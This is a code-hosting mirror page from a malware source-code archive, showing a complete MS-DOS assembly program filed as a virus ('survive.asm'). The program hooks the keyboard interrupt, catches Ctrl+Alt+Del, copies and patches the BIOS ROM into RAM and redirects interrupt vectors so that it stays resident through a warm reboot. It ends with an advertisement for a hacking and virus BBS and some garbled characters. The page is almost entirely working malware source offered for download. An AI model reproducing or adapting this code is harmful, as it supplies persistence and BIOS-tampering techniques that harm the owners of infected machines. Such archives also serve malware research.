Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-30 19:02:32 +00:00
Code Releases Activity
9b5457c80c
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.survive.asm

227 lines
5.0 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-12 23:58:25 +00:00
; Survive a warm reboot on a XT.
;
; Compile under Turbo Assembler 2.5
; This program works on a generic IBM PC/XT
.model tiny
.radix 16
.code
org 100
start:
jmp init
handler:
push ds
push ax
xor ax,ax
mov ds,ax
mov al,ds:[417]
and al,0c
cmp al,0c
jnz no_ctrl_alt
in al,[60]
cmp al,53
jz now_fuck
no_ctrl_alt:
pop ax
pop ds
db 0ea
oldvect dd ?
now_fuck:
mov ds:[472],1234
mov ax,ds:[413]
mov cx,6
shl ax,cl
push ax
mov es,ax
mov di,offset handler
push cs
pop ds
mov si,di
repz cmpsw
jnz new_move
mov dl,es:[top_seg]
pop ax
jmp short set_segm
new_move:
mov al,ah
cmp al,0a0
jnc set_top
mov al,0a0
set_top:
xchg ax,dx
pop ax
sub ax,1000
set_segm:
mov cs:[top_seg],dl
push ax
mov es,ax
mov di,0e000
mov ax,0f000
mov ds,ax
mov si,di
mov cx,1000
cld
rep movsw
cmp byte ptr [si-10],0ea
jnz cant_fuck
cmp [si-0dh],0f000
jnz cant_fuck
mov di,[si-0f]
cmp di,0e000
jc cant_fuck
mov al,[di]
cmp al,0e9
jnz no_jmp
add di,[di+1]
add di,3
no_jmp:
push di
mov cx,800
call protect_ram
call replace_ints
push es
pop ds
mov bx,0e000
mov cx,2000
xor al,al
check_lup:
add al,[bx]
inc bx
loop check_lup
neg al
mov [di-1],al
push cs
pop ds
mov word ptr ds:[tmp_handler],5ebh
mov si,offset start
mov di,si
mov cx,init-start
rep movsb
retf
cant_fuck:
db 0ea
dw 0
dw 0ffff
protect_ram:
jcxz cant_fuck
mov al,80
repnz scasb
jnz protect_ram
mov ax,[di]
and al,0f8
cmp al,0f8
jnz protect_ram
cmp ah,dl
jnz protect_ram
mov ax,es
mov es:[di+1],ah
ret
top_seg db ?
replace_ints:
jcxz cant_fuck
mov al,0a5
repnz scasb
jnz replace_ints
cmp [di],4747
jnz replace_ints
cmp [di+2],0fbe2
jnz replace_ints
add di,4
push cs
pop ds
mov [dummy],di
mov si,offset my_piece
mov cx,my_top-my_piece
rep movsb
exit_prn:
ret
my_piece:
push ax
mov cx,20
xor di,di
re_init:
scasw
mov ax,0f000
stosw
loop re_init
mov ax,offset tmp_handler
xchg ax,es:[di+44-80]
mov cs:[old_tmp],ax
mov ax,cs
xchg ax,es:[di+46-80]
mov cs:[old_tmp+2],ax
pop ax
db 0ea
dummy dw ?
dw 0f000
db 0
my_top:
print:
mov si,offset message
print_msg:
lodsb
cmp al,'$'
jz exit_prn
mov ah,0e
int 10
jmp print_msg
tmp_handler:
jmp $
go_old:
db 0ea
old_tmp dw ?
dw ?
push ds
push si
push ax
xor ax,ax
mov ds,ax
mov ax,offset handler
xchg ax,ds:[24]
mov word ptr cs:[oldvect],ax
mov ax,cs
xchg ax,ds:[26]
mov word ptr cs:[oldvect+2],ax
push cs
pop ds
mov word ptr [tmp_handler],9090
call print
pop ax
pop si
pop ds
jmp go_old
message:
db 'Never ending story...',0dh,0a,'$'
init:
mov ax,3509
int 21
mov word ptr [oldvect],bx
mov word ptr [oldvect+2],es
mov dx,offset handler
mov ah,25
int 21
call print
mov dx,offset init
int 27
end start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Copy Permalink